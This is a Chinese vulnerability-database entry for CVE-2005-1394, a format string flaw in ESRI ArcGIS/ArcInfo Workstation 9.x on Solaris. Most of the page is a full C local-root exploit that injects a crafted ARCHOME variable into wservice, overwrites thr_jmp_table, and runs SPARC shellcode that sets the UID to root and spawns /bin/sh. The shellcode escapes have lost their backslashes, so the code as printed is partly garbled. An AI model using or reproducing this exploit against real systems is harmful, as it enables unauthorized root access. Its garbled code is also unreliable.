ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞

漏洞ID	1108733	漏洞类型	格式化字符串
发布时间	2005-04-30	更新时间	2005-10-20
CVE编号	CVE-2005-1394	CNNVD-ID	CNNVD-200505-877
漏洞平台	Solaris	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/972
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-877

|漏洞详情

ESRIArcInfoWorkstation9.0的ArcGIS存在格式化字符串漏洞，本地用户可以通过在传递给(1)wservice或(2)lockmgr的ARCHOME环境变量中的格式化字符串限定符来获取权限。

|漏洞EXP

/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <[email protected]>
** Exploit by John H. <[email protected]>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/

#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP                     "xa2x1cx40x11"
int             iType;

struct
{
       unsigned long retloc;
       unsigned long retaddr;
       char          *type;
}targets[] =
{

       /* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
          0003a234 d thr_jmp_table
        */
       {0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
       {0x41424344,0x41424344,"DEBUG"},
        },v;

//shellcode taken from netric
char shellcode[] =
"55"

NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP

       // setreuid(0,0);

       "x90x1dx80x16"      // xor  %l6, %l6, %o0
       "x92x1dx80x16"      // xor  %l6, %l6, %o1
       "x82x10x20xca"      // mov  0xca, %g1
       "x91xd0x20x08"      // ta  8

       "x90x1dx80x16"      // xor          %l6, %l6, %o0
       "x92x1dx80x16"      // xor          %l6, %l6, %o1
       "x82x18x40x01"      // xor          %g1, %g1, %g1
       "x82x10x20xcb"      // mov          0x2e, %g1
       "x91xd0x20x08"      // ta           8                       [setregid(0,0)]

       "x21x0bxd9x19"      // sethi        %hi(0x2f646400), %l0
       "xa0x14x21x76"      // or           %l0, 0x176, %l0
       "x23x0bxddx1d"      // sethi        %hi(0x2f747400), %l1
       "xa2x14x60x79"      // or           %l1, 0x79, %l1
       "xe0x3bxbfxf8"      // std          %l0, [ %sp - 0x8 ]
       "x90x23xa0x08"      // sub          %sp, 8, %o0
       "x92x1bx80x0e"      // xor          %sp, %sp, %o1
       "x82x10x20x05"      // mov          0x05, %g1
       "x91xd0x20x08"      // ta           8                       [open("/dev/tty",RD_ONLY)]

       "x90x10x20x02"      // mov          0x02, %o0
       "x82x10x20x29"      // mov          0x29, %g1
       "x91xd0x20x08"      // ta           8                       [dup(2)]

       "x21x0bxd8x9a"      // sethi        %hi(0x2f626800), %l0
       "xa0x14x21x6e"      // or           %l0, 0x16e, %l0
       "x23x0bxcbxdc"      // sethi        %hi(0x2f2f7000), %l1
       "xa2x14x63x68"      // or           %l1, 0x368, %l1
       "xe0x3bxbfxf0"      // std          %l0, [ %sp - 0x10 ]
       "xc0x23xbfxf8"      // clr          [ %sp - 0x8 ]
       "x90x23xa0x10"      // sub          %sp, 0x10, %o0
       "xc0x23xbfxec"      // clr          [ %sp - 0x14 ]
       "xd0x23xbfxe8"      // st           %o0, [ %sp - 0x18 ]
       "x92x23xa0x18"      // sub          %sp, 0x18, %o1
       "x94x22x80x0a"      // sub          %o2, %o2, %o2
       "x82x18x40x01"      // xor          %g1, %g1, %g1
       "x82x10x20x3b"      // mov          0x3b, %g1
       "x91xd0x20x08"      // ta           8                       [execve("/bin/sh","/bin/sh",NULL)]

       "x82x10x20x01"      // mov          0x01, %g1
       "x91xd0x20x08"      // ta           8                       [exit(?)]

       "x10xbfxffxdf"      // b            shellcode
       "x90x1dx80x16";     // or           %o1, %o1, %o1

/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
   *ptr++ = (char) (value >> 24) & 0xff;
   *ptr++ = (char) (value >> 16) & 0xff;
   *ptr++ = (char) (value >> 8) & 0xff;
   *ptr++ = (char) (value >> 0) & 0xff;

   return ptr;
}

/* main */
int main(int argc, char **argv)
{

   unsigned long retaddr;
   unsigned long retloc;
   int offset = 23;
   int dump_fmt=129;
   int al = 1;
   int i=0;
   int x=0;
   int c;
   unsigned long hi,lo;
   static unsigned long shift0,shift1;
   char    buf[9000];
   char    *args[24];
   char    *env[6];
   char            *ptr;
   char            padding[64];
   char            padding1[64];
   char            buf2[9000];

   if (argc < 3) {
               usage (argv[0]);
               return -1;
       }

     while((c = getopt(argc, argv, "h:t:")) != EOF) {
               switch(c) {
                       case 'h':
                               usage (argv[0]);
                               return 0;
                       case 't':
                               iType = atoi (optarg);
                               break;
                       default:
                               usage (argv[0]);
                               return 0;
               }
       }

if (argc < 2) { usage(argv[0]); exit(1); }

   if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
   {
       usage(argv[0]);
       printf("[-] Invalid type.n");
       return 0;
}

   env[0] = shellcode;
   env[1] = buf2;
   env[2] = NULL;

   args[0] = VULPROG;
   args[1] = NULL;

  retloc =  targets[iType].retloc;
  retaddr = targets[iType].retaddr;

   hi = (retaddr >> 16) & 0xffff;
   lo = (retaddr >> 0) & 0xffff;

   shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
   shift1 = (0x10000 +  lo) - hi;

   memset(buf,0x00,sizeof(buf));
   memset(buf2,0x00,sizeof(buf2));
   ptr = buf;

    for (i = 0; i < al; i++) {
               *ptr++ = 0x41;
       }

   ptr = putLong (ptr, 0x41414141);
   ptr = putLong (ptr, retloc);
   ptr = putLong (ptr, 0x42424242);
   ptr = putLong (ptr, retloc+2);

   for (i = 0 ; i < dump_fmt; i ++) {
               memcpy(ptr, "%.8x", 4);
               ptr = ptr + 4;
    }

   strcat(ptr,"%.");
 sprintf(ptr+strlen(ptr),"%u",shift0);
  strcat(ptr,"lx%hn");

  strcat(ptr,"%.");
   sprintf(ptr+strlen(ptr),"%u",shift1);
   strcat(ptr,"lx%hn");

   strcat(buf2,"ARCHOME=");
   memcpy(buf2+strlen(buf2),buf,strlen(buf));

   execve (args[0], args, env);
   perror ("execve");
 return 0;
}

int usage(char *p)
{
   int     i;
   printf( "Arcgis local root format string exploitrn");
   printf( "Usage: %s <-t target>n",p);
   for(i=0;i<sizeof(targets)/sizeof(v);i++)
   {
       printf("%dt%sn", i, targets[i].type);
   }
   return 0;
}

// milw0rm.com [2005-04-30]

|参考资料

来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt
来源:SECTRACK
名称:1013852
链接:http://securitytracker.com/id?1013852
来源:SECUNIA
名称:15196
链接:http://secunia.com/advisories/15196
来源:support.esri.com
链接:http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID;=14&MetaID;=1015
来源:FULLDISC
名称:20050430DMA[2005-0425a]-‘ESRIArcGIS9.xmultiplelocalvulnerabilities
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=111489411524630&w;=2

相关推荐: Microsoft OWC Spreadsheet XMLURL Local File Existence Disclosure Vulnerability

Microsoft OWC Spreadsheet XMLURL Local File Existence Disclosure Vulnerability 漏洞ID 1102211 漏洞类型 Design Error 发布时间 2002-04-08 更新时间…

文章版权归作者所有，未经允许请勿转载。

THE END